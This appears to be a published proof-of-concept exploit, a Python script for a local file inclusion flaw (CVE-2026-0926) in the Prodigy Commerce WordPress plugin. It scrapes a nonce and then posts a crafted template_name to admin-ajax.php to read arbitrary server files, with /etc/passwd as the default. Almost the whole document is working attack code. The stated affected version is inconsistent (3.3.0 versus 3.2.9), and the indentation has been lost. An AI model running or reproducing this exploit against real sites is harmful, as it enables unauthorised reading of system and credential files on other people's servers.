# Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://prodigycommerce.com/
# Software Link: https://wordpress.org/plugins/prodigy-commerce/
# Version: 3.2.9
# Tested on: Debian
# CVE : CVE-2026-0926
# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.
import httpx
import asyncio
import re
from urllib.parse import urljoin
import argparse
def get_nonce(base_url):
with httpx.Client(verify=False) as client:
r = client.get(url=base_url)
match = re.search(r'var settings\s*=\s*{[^}]*"nonce":"([^"]+)"', r.text)
if match:
nonce = match.group(1)
return nonce
else:
print("Nonce not found")
async def main(base_url,file):
async with httpx.AsyncClient(verify=False) as client:
nonce = get_nonce(base_url)
data = {
"action": "prodigy-render-my-account-widget",
"nonce": nonce,
"parameters[template_name]": file,
"parameters[default_path]": "/"
}
url = urljoin(base_url, '/wp-admin/admin-ajax.php')
r = await client.post(url=url, data=data)
raw = r.json()
out = raw['data']
print(out['html'])
parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
args = parser.parse_args()
asyncio.run(main(args.url, args.file))
